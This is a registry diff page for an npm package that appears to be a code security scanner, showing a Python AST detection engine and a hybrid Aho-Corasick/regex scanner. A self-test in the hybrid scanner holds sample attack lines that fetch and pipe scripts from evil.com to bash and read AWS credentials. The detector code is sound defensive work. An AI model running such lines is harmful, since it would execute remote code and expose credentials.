npm - caidongyun - Versions diffs - 6.1.2 - Mend

caidongyun 6.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (20) hide show

package/README.md +310 -0
package/RELEASE_NOTES.md +200 -0
package/SKILL.md +294 -0
package/config_detector.py +134 -0
package/index.d.ts +43 -0
package/index.js +34 -0
package/package.json +72 -0
package/requirements.txt +11 -0
package/rules/dist/all_rules.json +1 -0
package/scan +17 -0
package/scanner.py +322 -0
package/src/encoding_utils.py +239 -0
package/src/engines/__init__.py +1086 -0
package/src/engines/aho_corasick_scanner.py +520 -0
package/src/engines/ast_engine.py +290 -0
package/src/engines/hybrid_scanner.py +284 -0
package/src/engines/llm_engine.py +379 -0
package/src/engines/pattern_engine.py +296 -0
package/src/engines/rule_engine.py +282 -0
package/whitelist_filter.py +394 -0

package/src/engines/ast_engine.py ADDED Viewed

@@ -0,0 +1,290 @@
+#!/usr/bin/env python3
+"""
+AST 引擎 - 基于 Python AST 的深度检测
+"""
+import ast
+import re
+from typing import List, Dict, Optional, Tuple
+from dataclasses import dataclass
+from pathlib import Path
@dataclass
class ASTHit:
    """A single finding reported by the AST engine."""
    rule_id: str  # 'id' of the rule that fired
    line: int  # node.lineno of the offending node, 0 when the node has none
    column: int  # node.col_offset of the offending node, 0 when absent
    severity: str  # CRITICAL, HIGH, MEDIUM, LOW
    message: str  # 'message' text of the rule that fired
    code_snippet: str  # stripped source line cut to 100 chars, '' if unavailable


class ASTEngine:
    """Detection engine that walks a Python AST and applies built-in rules."""

    def __init__(self):
        self.rules = self.load_rules()

    def load_rules(self) -> List[Dict]:
        """Return the built-in AST rules.

        Every rule is a dict with 'id', 'name', 'check', 'severity' and
        'message'; the remaining keys depend on the 'check' kind
        ('call', 'import', 'assign' or 'binop').
        """
        return [
            # === Code execution ===
            {
                'id': 'AST-EXEC-001',
                'name': 'exec_call',
                'check': 'call',
                'func_names': ['exec'],
                'severity': 'CRITICAL',
                'message': '使用 exec() 可能导致代码注入'
            },
            {
                'id': 'AST-EVAL-001',
                'name': 'eval_call',
                'check': 'call',
                'func_names': ['eval'],
                'severity': 'CRITICAL',
                'message': '使用 eval() 可能导致代码注入'
            },
            {
                'id': 'AST-COMPILE-001',
                'name': 'compile_call',
                'check': 'call',
                'func_names': ['compile'],
                'severity': 'HIGH',
                'message': '使用 compile() 可能动态生成代码'
            },
            # === Shell injection ===
            {
                'id': 'AST-SYSTEM-001',
                'name': 'os_system_call',
                'check': 'call',
                'attr_names': ['system'],
                'module': 'os',
                'severity': 'CRITICAL',
                'message': 'os.system() 可能导致 shell 注入'
            },
            {
                'id': 'AST-SUBPROCESS-001',
                'name': 'subprocess_call',
                'check': 'call',
                'attr_names': ['call', 'run', 'Popen', 'check_output', 'check_call'],
                'module': 'subprocess',
                'severity': 'HIGH',
                'message': 'subprocess 调用可能执行系统命令'
            },
            # === Dangerous imports ===
            {
                'id': 'AST-IMPORT-001',
                'name': 'dangerous_import',
                'check': 'import',
                'modules': ['os', 'sys', 'subprocess', 'socket', 'ctypes'],
                'severity': 'LOW',
                'message': '导入危险模块'
            },
            # === Hard-coded credentials ===
            {
                'id': 'AST-PASSWORD-001',
                'name': 'hardcoded_password',
                'check': 'assign',
                'keywords': ['password', 'passwd', 'pwd', 'secret', 'api_key', 'token'],
                'severity': 'HIGH',
                'message': '可能包含硬编码凭据'
            },
            # === SQL injection ===
            {
                'id': 'AST-SQL-001',
                'name': 'sql_string_format',
                'check': 'binop',
                'operators': ['%', '+'],
                'keywords': ['SELECT', 'INSERT', 'UPDATE', 'DELETE', 'FROM', 'WHERE'],
                'severity': 'CRITICAL',
                'message': 'SQL 语句字符串拼接可能导致注入'
            },
        ]

    def _rules_for(self, check: str) -> List[Dict]:
        """Return the rules whose 'check' field equals *check*."""
        return [rule for rule in self.rules if rule['check'] == check]

    def scan(self, file_path: str, content: str) -> List[ASTHit]:
        """Parse *content* and return every rule hit found in its AST.

        Args:
            file_path: Name of the scanned file; only used in log output.
            content: Python source text to analyse.

        Returns:
            The hits in AST walk order, or an empty list when the source
            cannot be parsed or the analysis fails.
        """
        hits = []
        try:
            tree = ast.parse(content)
            for node in ast.walk(tree):
                if isinstance(node, ast.Call):
                    hits.extend(self.check_call(node, content))
                elif isinstance(node, ast.Import):
                    hits.extend(self.check_import(node, content))
                elif isinstance(node, ast.ImportFrom):
                    hits.extend(self.check_import_from(node, content))
                elif isinstance(node, ast.Assign):
                    hits.extend(self.check_assign(node, content))
                elif isinstance(node, ast.BinOp):
                    # String building with + or % (SQL concatenation).
                    hits.extend(self.check_binop(node, content))
            return hits
        except SyntaxError:
            # Not valid Python source: nothing to analyse.
            return []
        except Exception:
            # Stay best-effort, but leave a trace instead of hiding the failure.
            import logging
            logging.getLogger(__name__).warning(
                "AST scan of %s failed", file_path, exc_info=True)
            return []

    def check_call(self, node: ast.Call, content: str) -> List[ASTHit]:
        """Match a call node against the 'call' rules.

        A bare-name call (``exec(...)``) is compared with the rule's
        'func_names'; an attribute call on a plain name (``os.system(...)``)
        is compared with the rule's 'attr_names' and 'module'.
        """
        hits = []
        func = node.func
        for rule in self._rules_for('call'):
            if isinstance(func, ast.Name):
                matched = func.id in rule.get('func_names', [])
            elif isinstance(func, ast.Attribute):
                matched = (
                    func.attr in rule.get('attr_names', [])
                    and isinstance(func.value, ast.Name)
                    and func.value.id == rule.get('module', '')
                )
            else:
                matched = False
            if matched:
                hits.append(self.create_hit(rule, node, content))
        return hits

    def check_import(self, node: ast.Import, content: str = '') -> List[ASTHit]:
        """Match an ``import a, b.c`` statement against the 'import' rules.

        Only the top-level package of each imported name is compared, so
        ``import os.path`` is reported just like ``import os``. One hit is
        produced per matching name.

        Args:
            node: The import statement.
            content: Full source text, used for the hit's code snippet.
        """
        hits = []
        for rule in self._rules_for('import'):
            modules = rule.get('modules', [])
            for alias in node.names:
                if alias.name.split('.')[0] in modules:
                    hits.append(self.create_hit(rule, node, content))
        return hits

    def check_import_from(self, node: ast.ImportFrom, content: str = '') -> List[ASTHit]:
        """Match a ``from x import y`` statement against the 'import' rules.

        Relative imports (``from .os import x``) name a package-local module,
        not the listed top-level one, and are therefore skipped.

        Args:
            node: The from-import statement.
            content: Full source text, used for the hit's code snippet.
        """
        hits = []
        if node.level or not node.module:
            return hits
        root = node.module.split('.')[0]
        for rule in self._rules_for('import'):
            if root in rule.get('modules', []):
                hits.append(self.create_hit(rule, node, content))
        return hits

    def check_assign(self, node: ast.Assign, content: str) -> List[ASTHit]:
        """Report string constants assigned to credential-like variable names.

        A plain-name target is reported once per rule when its lower-cased
        name contains any of the rule's keywords.
        """
        hits = []
        value = node.value
        if not (isinstance(value, ast.Constant) and isinstance(value.value, str)):
            return hits
        for rule in self._rules_for('assign'):
            keywords = rule.get('keywords', [])
            for target in node.targets:
                if not isinstance(target, ast.Name):
                    continue
                var_name = target.id.lower()
                # any() stops at the first keyword, so a name such as
                # password_token is not reported once per keyword.
                if any(keyword in var_name for keyword in keywords):
                    hits.append(self.create_hit(rule, node, content))
        return hits

    def check_binop(self, node: ast.BinOp, content: str) -> List[ASTHit]:
        """Report ``+`` / ``%`` expressions whose text contains an SQL keyword."""
        hits = []
        if type(node.op).__name__ not in ('Mod', 'Add'):
            return hits
        rules = self._rules_for('binop')
        if not rules:
            return hits
        if hasattr(ast, 'unparse'):
            code = ast.unparse(node)
        else:
            # Without ast.unparse, look only at this expression's own source
            # text rather than at the whole file.
            code = ast.get_source_segment(content, node) or ''
        code_upper = code.upper()
        for rule in rules:
            if any(keyword in code_upper for keyword in rule.get('keywords', [])):
                hits.append(self.create_hit(rule, node, content))
        return hits

    def create_hit(self, rule: Dict, node: ast.AST, content: str) -> ASTHit:
        """Build an ASTHit for *rule* at the position of *node*.

        The snippet is the stripped source line the node starts on, cut to
        100 characters; it stays empty when *content* is empty or the node
        has no usable line number.
        """
        code_snippet = ''
        if content:
            lines = content.split('\n')
            if hasattr(node, 'lineno') and node.lineno <= len(lines):
                code_snippet = lines[node.lineno - 1].strip()[:100]
        return ASTHit(
            rule_id=rule['id'],
            line=getattr(node, 'lineno', 0),
            column=getattr(node, 'col_offset', 0),
            severity=rule['severity'],
            message=rule['message'],
            code_snippet=code_snippet
        )

    def scan_file(self, file_path: str) -> List[ASTHit]:
        """Read *file_path* and scan it (convenience wrapper around scan).

        Returns an empty list when the file cannot be read or decoded.
        """
        try:
            # utf-8-sig drops a leading byte-order mark, which would otherwise
            # reach the parser as a stray U+FEFF character.
            with open(file_path, 'r', encoding='utf-8-sig') as f:
                content = f.read()
        except Exception:
            import logging
            logging.getLogger(__name__).debug(
                "Could not read %s", file_path, exc_info=True)
            return []
        return self.scan(file_path, content)
# Self-test: run the engine over a small sample and print what it finds.
if __name__ == '__main__':
    # One statement per rule family (imports, credential, exec, shell, SQL).
    sample_source = """
import os
import subprocess
password = "secret123"
exec(user_input)
os.system("ls -la")
subprocess.call(["echo", "hello"])
query = "SELECT * FROM users WHERE id=" + user_id
"""
    findings = ASTEngine().scan("test.py", sample_source)
    print(f"检测到 {len(findings)} 个问题:")
    for finding in findings:
        print(f"  {finding.rule_id} [{finding.severity}] 行{finding.line}: {finding.message}")

package/src/engines/hybrid_scanner.py ADDED Viewed

@@ -0,0 +1,284 @@
+#!/usr/bin/env python3
+"""
+混合扫描器 - Aho-Corasick 预筛选 + Regex 精匹配
+架构:
+1. Aho-Corasick 自动机快速预筛选（0.5ms）
+   - 提取所有规则的关键词
+   - 一次遍历匹配所有关键词
+   - 返回候选攻击类型
+2. Regex 引擎精匹配（2ms）
+   - 只匹配候选攻击类型的规则
+   - 保持 100% 检测精度
+"""
+import ahocorasick
+import re
+import time
+from typing import Dict, List, Set, Tuple
+from pathlib import Path
class HybridRuleEngine:
    """
    Hybrid rule engine: Aho-Corasick keyword prefilter + regex confirmation.

    The prefilter works at category level: a category becomes a candidate as
    soon as any keyword extracted from one of its patterns occurs in the
    content. Only rules of candidate categories are then checked by regex.

    NOTE: keyword extraction is a heuristic. A pattern whose literal words
    are only partially required (e.g. ``colou?r``) may still be filtered out.
    """

    # Words too common to be useful as prefilter keywords.
    _COMMON_WORDS = frozenset(
        {'the', 'and', 'for', 'not', 'with', 'from', 'import', 'def', 'return'})
    # A backslash escape such as \b, \s or \. (never literal text to search for).
    _ESCAPE_SEQUENCE = re.compile(r'\\.', re.DOTALL)
    # Named-group syntax (?P<name> / (?P=name): the name is not pattern text.
    _NAMED_GROUP_SYNTAX = re.compile(r'\(\?P(?:<\w+>|=\w+\))')
    # Literal word candidates: letters, digits, underscore, length >= 3.
    _LITERAL_WORD = re.compile(r'[a-zA-Z0-9_]{3,}')

    def __init__(self, rules_file: Path):
        """
        Load the rules, build the keyword automaton and group the rules.

        Args:
            rules_file: Path of the rule file (JSON).
        """
        self.rules_file = rules_file
        self.rules = []
        self.rules_by_category = {}
        self.automaton = None
        self.keywords = set()
        # Categories with at least one pattern that yields no keyword; they
        # cannot be prefiltered and are always regex-checked.
        self._always_categories = set()
        # pattern text -> compiled regex, or None for an invalid pattern.
        self._regex_cache = {}
        self._load_rules()
        self._build_automaton()
        self._group_rules_by_category()

    def _load_rules(self):
        """Read the 'rules' list from the JSON rule file into self.rules."""
        import json
        with open(self.rules_file, 'r', encoding='utf-8') as f:
            data = json.load(f)
        self.rules = data.get('rules', [])
        print(f"✅ 加载 {len(self.rules)} 条规则")

    def _extract_keywords(self, pattern: str) -> List[str]:
        """
        Extract literal keywords from a regex pattern.

        Example: r'curl\\s+\\|.*bash' -> ['curl', 'bash']

        Args:
            pattern: Regular expression source.

        Returns:
            Words of three or more word characters, in pattern order, minus a
            few very common words.
        """
        # Drop escapes first: in r'\bcurl' the 'b' belongs to the \b anchor
        # and must not be glued onto the keyword.
        literal_text = self._ESCAPE_SEQUENCE.sub(' ', pattern)
        literal_text = self._NAMED_GROUP_SYNTAX.sub(' ', literal_text)
        words = self._LITERAL_WORD.findall(literal_text)
        return [w for w in words if w.lower() not in self._COMMON_WORDS]

    def _build_automaton(self):
        """Build the Aho-Corasick automaton from the keywords of all rules.

        Each lower-cased keyword is stored once, with the set of every
        category that uses it as its payload.
        """
        print("🔧 构建 Aho-Corasick 自动机...")
        start = time.time()
        self.automaton = ahocorasick.Automaton()
        self._always_categories = set()
        # A keyword can be shared by several categories. add_word keeps a
        # single payload per key, so gather all categories before adding.
        keyword_categories = {}
        for rule in self.rules:
            category = rule.get('category', 'unknown')
            for pattern in rule.get('patterns', []):
                keywords = self._extract_keywords(pattern)
                if not keywords:
                    self._always_categories.add(category)
                    continue
                for keyword in keywords:
                    keyword_categories.setdefault(keyword.lower(), set()).add(category)
        for keyword, categories in keyword_categories.items():
            self.automaton.add_word(keyword, frozenset(categories))
        self.keywords = set(keyword_categories)
        if keyword_categories:
            # Converts the trie into a searchable automaton.
            self.automaton.make_automaton()
        elapsed = (time.time() - start) * 1000
        print(f"✅ 自动机构建完成 ({elapsed:.1f}ms)")
        print(f"   关键词数：{len(self.keywords)}")
        print(f"   自动机大小：{len(self.automaton)}")

    def _group_rules_by_category(self):
        """Group self.rules by their 'category' (default 'unknown')."""
        self.rules_by_category = {}
        for rule in self.rules:
            category = rule.get('category', 'unknown')
            self.rules_by_category.setdefault(category, []).append(rule)
        print(f"✅ 规则分组完成 ({len(self.rules_by_category)} 个类别)")

    def scan(self, content: str) -> Dict:
        """
        Scan content with the prefilter followed by regex confirmation.

        Args:
            content: Text to scan.

        Returns:
            Dict with 'hit_count', 'matches', 'candidate_categories' and
            'scan_time_ms'.
        """
        start = time.time()
        # Step 1: keyword prefilter.
        candidate_categories = self._prefilter(content)
        # Step 2: regex confirmation, restricted to the candidate categories.
        matches = self._refine_match(content, candidate_categories)
        elapsed = (time.time() - start) * 1000
        return {
            'hit_count': len(matches),
            'matches': matches,
            'candidate_categories': list(candidate_categories),
            'scan_time_ms': elapsed
        }

    def _prefilter(self, content: str) -> Set[str]:
        """
        Select candidate categories with the keyword automaton.

        Args:
            content: Text to scan.

        Returns:
            Categories with a keyword present in the lower-cased content,
            plus the categories that cannot be prefiltered.
        """
        candidate_categories = set(self._always_categories)
        if not self.keywords:
            # Nothing was added to the automaton, so there is nothing to search.
            return candidate_categories
        for _end_idx, categories in self.automaton.iter(content.lower()):
            candidate_categories.update(categories)
        return candidate_categories

    def _compile(self, pattern: str):
        """Return the cached case-insensitive regex, or None if it is invalid."""
        cache = self.__dict__.setdefault('_regex_cache', {})
        if pattern not in cache:
            try:
                cache[pattern] = re.compile(pattern, re.IGNORECASE)
            except re.error:
                # Invalid patterns are skipped, and remembered as such.
                cache[pattern] = None
        return cache[pattern]

    def _refine_match(self, content: str, candidate_categories: Set[str]) -> List[Dict]:
        """
        Confirm candidates by regex.

        Args:
            content: Text to scan.
            candidate_categories: Categories selected by the prefilter.

        Returns:
            One dict per matching pattern, in rule-file order.
        """
        matches = []
        # Iterate the grouped rules, not the candidate set, so that the order
        # of the results is deterministic.
        for category, rules in self.rules_by_category.items():
            if category not in candidate_categories:
                continue
            for rule in rules:
                rule_id = rule.get('id', 'UNKNOWN')
                name = rule.get('name', 'Unknown Rule')
                confidence = rule.get('confidence', 80)
                severity = rule.get('severity', 'MEDIUM')
                for pattern in rule.get('patterns', []):
                    compiled = self._compile(pattern)
                    if compiled is None:
                        continue
                    match_obj = compiled.search(content)
                    if match_obj:
                        matches.append({
                            'rule_id': rule_id,
                            'name': name,
                            'category': category,
                            'confidence': confidence,
                            'severity': severity,
                            'pattern': pattern,
                            'match': match_obj.group(0)[:100]  # first 100 characters
                        })
        return matches

    def get_stats(self) -> Dict:
        """Return rule, keyword, automaton and category counts."""
        return {
            'total_rules': len(self.rules),
            'total_keywords': len(self.keywords),
            'automaton_size': len(self.automaton),
            'categories': len(self.rules_by_category)
        }
def test_hybrid_scanner():
    """Smoke-test the hybrid scanner against the packaged rule file.

    Prints a notice and returns when the rule file is missing; otherwise
    scans a small sample and prints the matches and engine statistics.
    """
    banner = "="*60
    print(banner)
    print("混合扫描器测试")
    print(banner)

    # The rule file sits three directory levels above this module.
    rules_path = Path(__file__).parent.parent.parent / 'rules' / 'dist' / 'all_rules.json'
    if not rules_path.exists():
        print(f"❌ 规则文件不存在：{rules_path}")
        return

    scanner = HybridRuleEngine(rules_path)

    # Sample text to scan.
    sample = """
    #!/usr/bin/env python3
    import os
    import requests
    # Supply chain attack
    response = requests.get('http://evil.com/malicious.sh')
    os.system('curl http://evil.com/backdoor.sh | bash')
    # Credential theft
    with open('~/.aws/credentials') as f:
        aws_key = f.read()
    """
    print("\n📝 测试内容:")
    print(sample[:200])
    print("...")

    print("\n🔍 开始扫描...")
    report = scanner.scan(sample)

    print("\n📊 扫描结果:")
    print(f"  候选类别：{report['candidate_categories']}")
    print(f"  匹配数：{report['hit_count']}")
    print(f"  耗时：{report['scan_time_ms']:.2f}ms")

    print("\n🎯 匹配详情:")
    # Show at most the first ten matches.
    for found in report['matches'][:10]:
        print(f"  [{found['severity']}] {found['rule_id']}: {found['name']}")
        print(f"     类别：{found['category']}, 置信度：{found['confidence']}")
        print(f"     匹配：{found['match'][:50]}...")

    # Engine statistics.
    summary = scanner.get_stats()
    print("\n📈 性能统计:")
    print(f"  规则数：{summary['total_rules']}")
    print(f"  关键词数：{summary['total_keywords']}")
    print(f"  自动机大小：{summary['automaton_size']}")
    print(f"  类别数：{summary['categories']}")


if __name__ == '__main__':
    test_hybrid_scanner()